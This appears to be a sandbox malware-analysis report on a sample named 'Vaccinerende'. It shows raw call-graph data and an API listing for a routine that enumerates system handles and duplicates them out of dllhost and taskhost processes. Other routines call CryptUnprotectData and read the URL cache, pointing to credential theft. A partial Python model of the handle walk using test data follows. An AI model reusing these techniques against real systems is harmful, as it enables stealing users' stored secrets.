39195 409b98 GetFileAttributesW 38716->39195 38725 445ce1 38717->38725 38718 445bb3 39222 445403 memset 38718->39222 38728 445a63 38719->38728 38720 40b2cc 27 API calls 38730 445bf3 38720->38730 38722->38674 38734 40b2cc 27 API calls 38723->38734 39239 409b98 GetFileAttributesW 38725->39239 38726->38680 38739 40b2cc 27 API calls 38728->38739 38729 44566d 38729->38660 39017 413d4c 38729->39017 39097 409d1f wcslen wcslen 38730->39097 38741 40b2cc 27 API calls 38731->38741 38732 445928 38732->38742 39129 40b6ef 38732->39129 38744 445def 38734->38744 38735 4459cb 38745 4459ed 38735->38745 38755 40b6ef 253 API calls 38735->38755 38748 445a94 38739->38748 38750 445d54 _wcsicmp 38741->38750 38742->38664 38742->38745 39126 40b1ab free free 38743->39126 38753 409d1f 6 API calls 38744->38753 38745->38675 38791 445b22 38745->38791 39127 40b1ab free free 38746->39127 38747 445389 259 API calls 38756 445bca 38747->38756 39196 40ae18 38748->39196 38760 445d71 38750->38760 38822 445d67 38750->38822 38752 445665 39113 40b1ab free free 38752->39113 38762 445e03 38753->38762 38755->38745 38756->38689 38756->38690 39240 445093 23 API calls 38760->39240 38761 44563c 38761->38752 38766 4087b3 338 API calls 38761->38766 39241 409b98 GetFileAttributesW 38762->39241 38763 4456d8 38769 40b2cc 27 API calls 38763->38769 38766->38761 38768 40b6ef 253 API calls 38768->38704 38774 4456e2 38769->38774 38770 40b2cc 27 API calls 38775 445c23 38770->38775 38771 445d83 38771->38704 38773 445e12 38780 445e6b 38773->38780 38784 40b2cc 27 API calls 38773->38784 39115 413fa6 _wcsicmp _wcsicmp 38774->39115 38778 409d1f 6 API calls 38775->38778 38776 445aa1 38779 445b17 38776->38779 38800 445ab2 memset 38776->38800 38814 409d1f 6 API calls 38776->38814 38818 445389 259 API calls 38776->38818 39203 40add4 38776->39203 39208 40ae51 38776->39208 38782 445c37 38778->38782 39216 40aebe 38779->39216 39243 445093 23 API calls 38780->39243 38781 4456eb 38787 4456fd memset memset memset memset 38781->38787 38788 
4457ea 38781->38788 38789 445389 259 API calls 38782->38789 38792 445e33 38784->38792 39116 409c70 wcscpy wcsrchr 38787->39116 39119 413d29 38788->39119 38790 445c47 38789->38790 38797 40b2cc 27 API calls 38790->38797 38791->38681 38791->38756 38798 409d1f 6 API calls 38792->38798 38794 445e7e 38799 445f67 38794->38799 38802 445c53 38797->38802 38803 445e47 38798->38803 38804 40b2cc 27 API calls 38799->38804 38805 40b2cc 27 API calls 38800->38805 38801 409c70 2 API calls 38806 44577e 38801->38806 38807 409d1f 6 API calls 38802->38807 39242 409b98 GetFileAttributesW 38803->39242 38809 445f73 38804->38809 38805->38776 38810 409c70 2 API calls 38806->38810 38811 445c67 38807->38811 38813 409d1f 6 API calls 38809->38813 38815 44578d 38810->38815 38816 445389 259 API calls 38811->38816 38812 445e56 38812->38780 38819 445e83 memset 38812->38819 38817 445f87 38813->38817 38814->38776 38815->38788 38821 40b2cc 27 API calls 38815->38821 38816->38756 39246 409b98 GetFileAttributesW 38817->39246 38818->38776 38823 40b2cc 27 API calls 38819->38823 38824 4457a8 38821->38824 38822->38704 38822->38768 38825 445eab 38823->38825 38826 409d1f 6 API calls 38824->38826 38827 409d1f 6 API calls 38825->38827 38828 4457b8 38826->38828 38829 445ebf 38827->38829 39118 409b98 GetFileAttributesW 38828->39118 38831 40ae18 9 API calls 38829->38831 38840 445ef5 38831->38840 38832 4457c7 38832->38788 38834 4087b3 338 API calls 38832->38834 38833 40ae51 9 API calls 38833->38840 38834->38788 38835 445f5c 38836 40aebe FindClose 38835->38836 38836->38799 38837 40add4 2 API calls 38837->38840 38838 40b2cc 27 API calls 38838->38840 38839 409d1f 6 API calls 38839->38840 38840->38833 38840->38835 38840->38837 38840->38838 38840->38839 38842 445f3a 38840->38842 39244 409b98 GetFileAttributesW 38840->39244 39245 445093 23 API calls 38842->39245 38844->38641 38845->38647 38846->38641 38847->38639 38849 40c775 38848->38849 39247 40b1ab free free 38849->39247 38851 40c788 39248 40b1ab free free 38851->39248 
38853 40c790 39249 40b1ab free free 38853->39249 38855 40c798 38856 40aa04 free 38855->38856 38857 40c7a0 38856->38857 39250 40c274 memset 38857->39250 38862 40a8ab 9 API calls 38863 40c7c3 38862->38863 38864 40a8ab 9 API calls 38863->38864 38865 40c7d0 38864->38865 39279 40c3c3 38865->39279 38869 40c877 38878 40bdb0 38869->38878 38870 40c86c 39307 4053fe 39 API calls 38870->39307 38873 40c813 _wcslwr 39305 40c634 50 API calls 38873->39305 38875 40c829 wcslen 38876 40c7e5 38875->38876 38876->38869 38876->38870 39304 40a706 wcslen memcpy 38876->39304 39306 40c634 50 API calls 38876->39306 39529 404363 38878->39529 38883 40b2cc 27 API calls 38884 40be02 wcslen 38883->38884 38885 40bf5d 38884->38885 38893 40be1e 38884->38893 39549 40440c 38885->39549 38886 40be26 wcsncmp 38886->38893 38889 40be7d memset 38890 40bea7 memcpy 38889->38890 38889->38893 38891 40bf11 wcschr 38890->38891 38890->38893 38891->38893 38892 40b2cc 27 API calls 38894 40bef6 _wcsnicmp 38892->38894 38893->38885 38893->38886 38893->38889 38893->38890 38893->38891 38893->38892 38895 40bf43 LocalFree 38893->38895 39552 40bd5d 28 API calls 38893->39552 39553 404423 38893->39553 38894->38891 38894->38893 38895->38893 38896 4135f7 39568 4135e0 38896->39568 38899 40b2cc 27 API calls 38900 41360d 38899->38900 38901 40a804 8 API calls 38900->38901 38902 413613 38901->38902 38903 41363e 38902->38903 38904 40b273 27 API calls 38902->38904 38905 4135e0 FreeLibrary 38903->38905 38906 413625 GetProcAddress 38904->38906 38907 413643 38905->38907 38906->38903 38908 413648 38906->38908 38907->38667 38909 413658 38908->38909 38910 4135e0 FreeLibrary 38908->38910 38909->38667 38911 413666 38910->38911 38911->38667 38914 4136e2 38912->38914 38913 413827 39111 41366b FreeLibrary 38913->39111 38914->38913 38915 4137ac CoTaskMemFree 38914->38915 38915->38914 39571 4449b9 38916->39571 38919 444c1f 38919->38651 38920 4449b9 42 API calls 38922 444b4b 38920->38922 38921 444c15 38924 4449b9 42 API calls 38921->38924 
38922->38921 39592 444972 GetVersionExW 38922->39592 38924->38919 38925 444b99 memcmp 38930 444b8c 38925->38930 38926 444c0b 39596 444a85 42 API calls 38926->39596 38930->38925 38930->38926 39593 444aa5 42 API calls 38930->39593 39594 40a7a0 GetVersionExW 38930->39594 39595 444a85 42 API calls 38930->39595 38933 40399d 38932->38933 39597 403a16 38933->39597 38936 4039a3 38940 4039f4 38936->38940 38942 403a09 38936->38942 39608 40a02c CreateFileW 38936->39608 38937 403a12 wcsrchr 38937->38665 38941 4099c6 2 API calls 38940->38941 38940->38942 38941->38942 39611 40b1ab free free 38942->39611 38944 414c2e 17 API calls 38943->38944 38945 404048 38944->38945 38946 414c2e 17 API calls 38945->38946 38947 404056 38946->38947 38948 409d1f 6 API calls 38947->38948 38949 404073 38948->38949 38950 409d1f 6 API calls 38949->38950 38951 40408e 38950->38951 38952 409d1f 6 API calls 38951->38952 38953 4040a6 38952->38953 38954 403af5 20 API calls 38953->38954 38955 4040ba 38954->38955 38956 403af5 20 API calls 38955->38956 38957 4040cb 38956->38957 39638 40414f memset 38957->39638 38959 4040e0 38960 404140 38959->38960 38962 4040ec memset 38959->38962 38964 4099c6 2 API calls 38959->38964 38965 40a8ab 9 API calls 38959->38965 39652 40b1ab free free 38960->39652 38962->38959 38963 404148 38963->38695 38964->38959 38965->38959 39665 40a6e6 WideCharToMultiByte 38966->39665 38968 4087ed 39666 4095d9 memset 38968->39666 38971 408809 memset memset memset memset memset 38972 40b2cc 27 API calls 38971->38972 38973 4088a1 38972->38973 38974 409d1f 6 API calls 38973->38974 38975 4088b1 38974->38975 38976 40b2cc 27 API calls 38975->38976 38977 4088c0 38976->38977 38978 409d1f 6 API calls 38977->38978 38979 4088d0 38978->38979 38980 40b2cc 27 API calls 38979->38980 38981 4088df 38980->38981 38982 409d1f 6 API calls 38981->38982 38983 4088ef 38982->38983 38984 40b2cc 27 API calls 38983->38984 38985 4088fe 38984->38985 38986 409d1f 6 API calls 38985->38986 38987 40890e 38986->38987 38988 40b2cc 
27 API calls 38987->38988 38989 40891d 38988->38989 38990 409d1f 6 API calls 38989->38990 38991 40892d 38990->38991 39683 409b98 GetFileAttributesW 38991->39683 38993 40893e 38994 408943 38993->38994 38995 408958 38993->38995 39684 407fdf 75 API calls 38994->39684 39685 409b98 GetFileAttributesW 38995->39685 38998 408964 38999 408969 38998->38999 39000 40897b 38998->39000 39686 4082c7 199 API calls 38999->39686 39687 409b98 GetFileAttributesW 39000->39687 39003 408987 39004 4089a1 39003->39004 39005 40898c 39003->39005 39015 408953 39015->38695 39018 40b633 free 39017->39018 39019 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39018->39019 39020 413f00 Process32NextW 39019->39020 39021 413da5 OpenProcess 39020->39021 39022 413f17 CloseHandle 39020->39022 39023 413eb0 39021->39023 39024 413df3 memset 39021->39024 39022->38763 39023->39020 39026 413ebf free 39023->39026 39027 4099f4 3 API calls 39023->39027 39715 413f27 39024->39715 39026->39023 39027->39023 39028 413e37 GetModuleHandleW 39030 413e46 GetProcAddress 39028->39030 39032 413e1f 39028->39032 39030->39032 39031 413e6a QueryFullProcessImageNameW 39031->39032 39032->39028 39032->39031 39720 413959 39032->39720 39736 413ca4 39032->39736 39034 413ea2 CloseHandle 39034->39023 39036 414c2e 17 API calls 39035->39036 39037 403eb7 39036->39037 39038 414c2e 17 API calls 39037->39038 39039 403ec5 39038->39039 39040 409d1f 6 API calls 39039->39040 39041 403ee2 39040->39041 39042 409d1f 6 API calls 39041->39042 39043 403efd 39042->39043 39044 409d1f 6 API calls 39043->39044 39045 403f15 39044->39045 39046 403af5 20 API calls 39045->39046 39047 403f29 39046->39047 39048 403af5 20 API calls 39047->39048 39049 403f3a 39048->39049 39050 40414f 33 API calls 39049->39050 39056 403f4f 39050->39056 39051 403faf 39750 40b1ab free free 39051->39750 39052 403f5b memset 39052->39056 39054 403fb7 39054->38674 39055 4099c6 2 API calls 39055->39056 39056->39051 39056->39052 39056->39055 39057 40a8ab 9 API calls 39056->39057 
39057->39056 39059 414c2e 17 API calls 39058->39059 39060 403d26 39059->39060 39061 414c2e 17 API calls 39060->39061 39062 403d34 39061->39062 39063 409d1f 6 API calls 39062->39063 39064 403d51 39063->39064 39065 409d1f 6 API calls 39064->39065 39066 403d6c 39065->39066 39067 409d1f 6 API calls 39066->39067 39068 403d84 39067->39068 39069 403af5 20 API calls 39068->39069 39070 403d98 39069->39070 39071 403af5 20 API calls 39070->39071 39072 403da9 39071->39072 39073 40414f 33 API calls 39072->39073 39079 403dbe 39073->39079 39074 403e1e 39751 40b1ab free free 39074->39751 39076 403dca memset 39076->39079 39077 403e26 39077->38680 39078 4099c6 2 API calls 39078->39079 39079->39074 39079->39076 39079->39078 39080 40a8ab 9 API calls 39079->39080 39080->39079 39082 414b81 9 API calls 39081->39082 39083 414c40 39082->39083 39084 414c73 memset 39083->39084 39752 409cea 39083->39752 39085 414c94 39084->39085 39755 414592 RegOpenKeyExW 39085->39755 39088 414c64 SHGetSpecialFolderPathW 39089 414d0b 39088->39089 39089->38720 39090 414cf4 wcscpy 39090->39089 39091 414cc1 39091->39090 39756 414bb0 wcscpy 39091->39756 39094 414cd2 39757 4145ac RegQueryValueExW 39094->39757 39096 414ce9 RegCloseKey 39096->39090 39098 409d62 39097->39098 39099 409d43 wcscpy 39097->39099 39102 445389 39098->39102 39100 409719 2 API calls 39099->39100 39101 409d51 wcscat 39100->39101 39101->39098 39103 40ae18 9 API calls 39102->39103 39105 4453c4 39103->39105 39104 40ae51 9 API calls 39104->39105 39105->39104 39106 4453f3 39105->39106 39107 40add4 2 API calls 39105->39107 39110 445403 254 API calls 39105->39110 39108 40aebe FindClose 39106->39108 39107->39105 39109 4453fe 39108->39109 39109->38770 39110->39105 39111->38672 39112->38761 39113->38729 39114->38729 39115->38781 39117 409c89 39116->39117 39117->38801 39118->38832 39120 413d39 39119->39120 39121 413d2f FreeLibrary 39119->39121 39122 40b633 free 39120->39122 39121->39120 39123 413d42 39122->39123 39124 40b633 free 39123->39124 39125 
413d4a 39124->39125 39125->38660 39126->38668 39127->38659 39128->38732 39130 44db70 39129->39130 39131 40b6fc memset 39130->39131 39132 409c70 2 API calls 39131->39132 39133 40b732 wcsrchr 39132->39133 39134 40b743 39133->39134 39135 40b746 memset 39133->39135 39134->39135 39136 40b2cc 27 API calls 39135->39136 39137 40b76f 39136->39137 39138 409d1f 6 API calls 39137->39138 39139 40b783 39138->39139 39758 409b98 GetFileAttributesW 39139->39758 39141 40b792 39142 40b7c2 39141->39142 39143 409c70 2 API calls 39141->39143 39759 40bb98 39142->39759 39146 40b7a5 39143->39146 39149 40b2cc 27 API calls 39146->39149 39147 40b837 CloseHandle 39151 40b83e memset 39147->39151 39148 40b817 39150 409a45 3 API calls 39148->39150 39152 40b7b2 39149->39152 39153 40b827 CopyFileW 39150->39153 39792 40a6e6 WideCharToMultiByte 39151->39792 39155 409d1f 6 API calls 39152->39155 39153->39151 39155->39142 39156 40b866 39793 444432 39156->39793 39159 40bad5 39161 40baeb 39159->39161 39162 40bade DeleteFileW 39159->39162 39160 40b273 27 API calls 39164 40b89a 39160->39164 39163 40b04b ??3@YAXPAX 39161->39163 39162->39161 39165 40baf3 39163->39165 39839 438552 39164->39839 39165->38742 39168 40bacd 39870 443d90 111 API calls 39168->39870 39171 40bac6 39869 424f26 123 API calls 39171->39869 39172 40b8bd memset 39860 425413 17 API calls 39172->39860 39175 425413 17 API calls 39193 40b8b8 39175->39193 39178 40a71b MultiByteToWideChar 39178->39193 39179 40a734 MultiByteToWideChar 39179->39193 39182 40b9b5 memcmp 39182->39193 39183 4099c6 2 API calls 39183->39193 39184 404423 38 API calls 39184->39193 39187 40bb3e memset memcpy 39871 40a734 MultiByteToWideChar 39187->39871 39188 4251c4 137 API calls 39188->39193 39190 40bb88 LocalFree 39190->39193 39193->39171 39193->39172 39193->39175 39193->39178 39193->39179 39193->39182 39193->39183 39193->39184 39193->39187 39193->39188 39194 40ba5f memcmp 39193->39194 39861 4253ef 16 API calls 39193->39861 39862 40b64c SystemTimeToFileTime 
FileTimeToLocalFileTime 39193->39862 39863 4253af 17 API calls 39193->39863 39864 4253cf 17 API calls 39193->39864 39865 447280 memset 39193->39865 39866 447960 memset memcpy memcpy memcpy 39193->39866 39867 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39193->39867 39868 447920 memcpy memcpy memcpy 39193->39868 39194->39193 39195->38735 39197 40aebe FindClose 39196->39197 39198 40ae21 39197->39198 39199 4099c6 2 API calls 39198->39199 39200 40ae35 39199->39200 39201 409d1f 6 API calls 39200->39201 39202 40ae49 39201->39202 39202->38776 39204 40ade0 39203->39204 39207 40ae0f 39203->39207 39205 40ade7 wcscmp 39204->39205 39204->39207 39206 40adfe wcscmp 39205->39206 39205->39207 39206->39207 39207->38776 39209 40ae7b FindNextFileW 39208->39209 39210 40ae5c FindFirstFileW 39208->39210 39211 40ae94 39209->39211 39212 40ae8f 39209->39212 39210->39211 39213 409d1f 6 API calls 39211->39213 39215 40aeb6 39211->39215 39214 40aebe FindClose 39212->39214 39213->39215 39214->39211 39215->38776 39217 40aed1 39216->39217 39218 40aec7 FindClose 39216->39218 39217->38791 39218->39217 39220 4099d7 39219->39220 39221 4099da memcpy 39219->39221 39220->39221 39221->38718 39223 40b2cc 27 API calls 39222->39223 39224 44543f 39223->39224 39225 409d1f 6 API calls 39224->39225 39226 44544f 39225->39226 40137 409b98 GetFileAttributesW 39226->40137 39228 44545e 39229 445476 39228->39229 39230 40b6ef 253 API calls 39228->39230 39231 40b2cc 27 API calls 39229->39231 39230->39229 39232 445482 39231->39232 39233 409d1f 6 API calls 39232->39233 39234 445492 39233->39234 40138 409b98 GetFileAttributesW 39234->40138 39236 4454a1 39237 4454b9 39236->39237 39238 40b6ef 253 API calls 39236->39238 39237->38747 39238->39237 39239->38689 39240->38771 39241->38773 39242->38812 39243->38794 39244->38840 39245->38840 39246->38822 39247->38851 39248->38853 39249->38855 39251 414c2e 17 API calls 39250->39251 39252 40c2ae 39251->39252 39308 40c1d3 39252->39308 39257 40c3be 39274 40a8ab 39257->39274 39258 40afcf 2 API 
calls 39259 40c2fd FindFirstUrlCacheEntryW 39258->39259 39260 40c3b6 39259->39260 39261 40c31e wcschr 39259->39261 39262 40b04b ??3@YAXPAX 39260->39262 39263 40c331 39261->39263 39264 40c35e FindNextUrlCacheEntryW 39261->39264 39262->39257 39266 40a8ab 9 API calls 39263->39266 39264->39261 39265 40c373 GetLastError 39264->39265 39267 40c3ad FindCloseUrlCache 39265->39267 39268 40c37e 39265->39268 39269 40c33e wcschr 39266->39269 39267->39260 39270 40afcf 2 API calls 39268->39270 39269->39264 39271 40c34f 39269->39271 39272 40c391 FindNextUrlCacheEntryW 39270->39272 39273 40a8ab 9 API calls 39271->39273 39272->39261 39272->39267 39273->39264 39463 40a97a 39274->39463 39277 40a8cc 39277->38862 39278 40a8d0 7 API calls 39278->39277 39468 40b1ab free free 39279->39468 39281 40c3dd 39282 40b2cc 27 API calls 39281->39282 39283 40c3e7 39282->39283 39469 414592 RegOpenKeyExW 39283->39469 39285 40c3f4 39286 40c50e 39285->39286 39287 40c3ff 39285->39287 39301 405337 39286->39301 39288 40a9ce 4 API calls 39287->39288 39289 40c418 memset 39288->39289 39470 40aa1d 39289->39470 39292 40c471 39294 40c47a _wcsupr 39292->39294 39293 40c505 RegCloseKey 39293->39286 39295 40a8d0 7 API calls 39294->39295 39296 40c498 39295->39296 39297 40a8d0 7 API calls 39296->39297 39298 40c4ac memset 39297->39298 39299 40aa1d 39298->39299 39300 40c4e4 RegEnumValueW 39299->39300 39300->39293 39300->39294 39472 405220 39301->39472 39304->38873 39305->38875 39306->38876 39307->38869 39309 40ae18 9 API calls 39308->39309 39315 40c210 39309->39315 39310 40ae51 9 API calls 39310->39315 39311 40c264 39312 40aebe FindClose 39311->39312 39314 40c26f 39312->39314 39313 40add4 2 API calls 39313->39315 39320 40e5ed memset memset 39314->39320 39315->39310 39315->39311 39315->39313 39316 40c231 _wcsicmp 39315->39316 39317 40c1d3 35 API calls 39315->39317 39316->39315 39318 40c248 39316->39318 39317->39315 39333 40c084 22 API calls 39318->39333 39321 414c2e 17 API calls 39320->39321 39322 40e63f 39321->39322 
39323 409d1f 6 API calls 39322->39323 39324 40e658 39323->39324 39334 409b98 GetFileAttributesW 39324->39334 39326 40e667 39327 40e680 39326->39327 39328 409d1f 6 API calls 39326->39328 39335 409b98 GetFileAttributesW 39327->39335 39328->39327 39330 40e68f 39331 40c2d8 39330->39331 39336 40e4b2 39330->39336 39331->39257 39331->39258 39333->39315 39334->39326 39335->39330 39357 40e01e 39336->39357 39338 40e593 39339 40e5b0 39338->39339 39340 40e59c DeleteFileW 39338->39340 39341 40b04b ??3@YAXPAX 39339->39341 39340->39339 39343 40e5bb 39341->39343 39342 40e521 39342->39338 39380 40e175 39342->39380 39345 40e5c4 CloseHandle 39343->39345 39346 40e5cc 39343->39346 39345->39346 39347 40b633 free 39346->39347 39349 40e5db 39347->39349 39348 40e573 39350 40e584 39348->39350 39351 40e57c CloseHandle 39348->39351 39353 40b633 free 39349->39353 39401 40b1ab free free 39350->39401 39351->39350 39352 40e540 39352->39348 39400 40e2ab 30 API calls 39352->39400 39355 40e5e3 39353->39355 39355->39331 39402 406214 39357->39402 39360 40e16b 39360->39342 39363 40afcf 2 API calls 39364 40e08d OpenProcess 39363->39364 39365 40e0a4 GetCurrentProcess DuplicateHandle 39364->39365 39369 40e152 39364->39369 39366 40e0d0 GetFileSize 39365->39366 39367 40e14a CloseHandle 39365->39367 39438 409a45 GetTempPathW 39366->39438 39367->39369 39368 40e160 39372 40b04b ??3@YAXPAX 39368->39372 39369->39368 39371 406214 22 API calls 39369->39371 39371->39368 39372->39360 39373 40e0ea 39441 4096dc CreateFileW 39373->39441 39375 40e0f1 CreateFileMappingW 39376 40e140 CloseHandle CloseHandle 39375->39376 39377 40e10b MapViewOfFile 39375->39377 39376->39367 39378 40e13b CloseHandle 39377->39378 39379 40e11f WriteFile UnmapViewOfFile 39377->39379 39378->39376 39379->39378 39381 40e18c 39380->39381 39442 406b90 39381->39442 39384 40e1a7 memset 39390 40e1e8 39384->39390 39385 40e299 39452 4069a3 39385->39452 39391 40e283 39390->39391 39392 40dd50 _wcsicmp 39390->39392 39398 40e244 _snwprintf 39390->39398 39459 
[Call-graph edge list from the Joe Sandbox interactive viewer, continued from the previous page: node pairs such as 39390->39459 are viewer identifiers and cannot be recovered as a diagram. Functions named in the surviving edges, all in the injected module based at 0x00400000 (Vaccinerende.jbxd snapshot): a file reader at 00406224 (CreateFileW, SetFilePointerEx, ReadFile, GetLastError); the handle enumerator at 0040DD85 (GetModuleFileNameW, CreateFileW, NtQuerySystemInformation, OpenProcess, DuplicateHandle, _wcsicmp); GetProcAddress import-resolution chains at 00405211, 00404383 and 004449D1; a CryptUnprotectData caller at 00404485; a RegEnumValueW loop at 0040AA23; a directory walk at 00403AF5 (wcscmp, FindClose); GetFileTime/CompareFileTime at 0040A051 and 004039CA; GetPrivateProfileStringW and WritePrivateProfileStringW at 004144A3 and 00414495; a second file reader at 00409529 (CreateFileW, GetFileSize, ReadFile); K32GetModuleFileNameExW at 00413F37; GetProcessTimes at 00413CE3; GetVersionExW at 00409CF9 and 0041739B; MultiByteToWideChar and WideCharToMultiByte conversions at 0040AB4A and 0040BC61; EnumResourceNamesW at 0041493C; and CRT start-up (_onexit, __dllonexit) at 004465E4. The per-function API listings that follow give the usable detail.]

                                                                              Control-flow Graph

                                                                              [Basic-block graph for function 0040DD85 (interactive viewer residue; the executed/not-executed colouring is not recoverable). Blocks in order: 0040DD85 memset, call 00409BCA, CreateFileW; 0040DDF1 call 0040AFCF (allocate), call 0041352F (resolve Nt* exports); 0040DE0B NtQuerySystemInformation; 0040DE29 branches back to 0040DDF1 (retry) or on to 0040DE3B CloseHandle, GetCurrentProcessId; 0040DE7A call 00413CFA, call 00413D4C (process snapshot); 0040DE94 loop head: call 0040E6AD, call 00409C52, _wcsicmp, then _wcsicmp at 0040DEBD and 0040DED0; 0040DEE7 OpenProcess; 0040DF23 GetCurrentProcess, DuplicateHandle; 0040DF4C memset, call 0041352F; 0040DF8F CloseHandle, call 00409C52 x2, _wcsicmp; 0040DFEF CloseHandle; 0040DFFD branches back to 0040DE94 or to 0040E00C call 00413D29 (cleanup and return).]
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040DDAD
                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
                                                                              • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                              • CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
                                                                              • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                              • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                              • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                              • _wcsicmp.MSVCRT ref: 0040DED8
                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                              • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                              • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                              • memset.MSVCRT ref: 0040DF5F
                                                                              • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                              • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                              • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                              • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                              • API String ID: 708747863-3398334509
                                                                              • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                              • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                              • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                              • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
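The listing above shows the routine at 0040DD85 opening its own image (GetModuleFileNameW, then CreateFileW with GENERIC_READ and OPEN_EXISTING), calling NtQuerySystemInformation with class 0x10 (SystemHandleInformation) inside a retry loop, taking a process snapshot through 00413D4C, and, for processes whose names match the string table (dllhost.exe, taskhost.exe, taskhostex.exe), calling OpenProcess with 0x40 (PROCESS_DUP_HANDLE) followed by DuplicateHandle. The Python below is an added example written for this page, not code from the sandbox report or from the sample. It parses a 32-bit SYSTEM_HANDLE_INFORMATION buffer in the widely used layout (ULONG NumberOfHandles followed by packed 16-byte SYSTEM_HANDLE_TABLE_ENTRY_INFO records), models the allocate/query/retry loop that 0040DDF1-0040DE39 implies, and selects the entries owned by the named processes with a case-insensitive compare like _wcsicmp. The stand-in query function, the process list and the handle records are constructed test data; that the retry doubles the buffer and that 0xC0000004 (STATUS_INFO_LENGTH_MISMATCH, a value visible in the trace) is the status being handled are my assumptions, since the graph only shows the loop.

```python
"""Model of the handle-table walk in the routine at 0040DD85 (added example).

On 32-bit Windows NtQuerySystemInformation(SystemHandleInformation) fills a
ULONG count followed by packed 16-byte SYSTEM_HANDLE_TABLE_ENTRY_INFO records:
    USHORT UniqueProcessId; USHORT CreatorBackTraceIndex; UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes; USHORT HandleValue; PVOID Object; ULONG GrantedAccess;
"""
import struct

SYSTEM_HANDLE_INFORMATION = 0x10          # the class passed at 0040DE15
STATUS_SUCCESS = 0x00000000
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004  # assumed: the constant seen in the trace
STATUS_INVALID_INFO_CLASS = 0xC0000003

ENTRY_FMT = "<HHBBHII"                    # pid, bt_index, type, attrs, handle, object, access
ENTRY_SIZE = struct.calcsize(ENTRY_FMT)   # 16 bytes, no padding with '<'

# Names the routine compares against with _wcsicmp (String ID list above).
TARGET_NAMES = {"dllhost.exe", "taskhost.exe", "taskhostex.exe"}


def build_handle_buffer(records):
    """Constructed test data: serialise (pid, type_idx, handle, object, access) tuples."""
    out = struct.pack("<I", len(records))
    for pid, type_idx, handle, obj, access in records:
        out += struct.pack(ENTRY_FMT, pid, 0, type_idx, 0, handle, obj, access)
    return out


def fake_nt_query_system_information(info_class, buf_len, full_buffer):
    """Stand-in for the real call: demands a bigger buffer until buf_len fits."""
    if info_class != SYSTEM_HANDLE_INFORMATION:
        return STATUS_INVALID_INFO_CLASS, b""
    if buf_len < len(full_buffer):
        return STATUS_INFO_LENGTH_MISMATCH, b""
    return STATUS_SUCCESS, full_buffer


def query_handle_table(query, initial_len=0x1000, max_len=1 << 26):
    """The allocate / query / retry loop (0040DDF1 -> 0040DE0B -> back to 0040DDF1).

    Doubling the buffer each round is an assumption; the graph only shows the retry.
    Returns (raw buffer, number of calls made)."""
    buf_len, calls = initial_len, 0
    while buf_len <= max_len:
        calls += 1
        status, data = query(SYSTEM_HANDLE_INFORMATION, buf_len)
        if status == STATUS_SUCCESS:
            return data, calls
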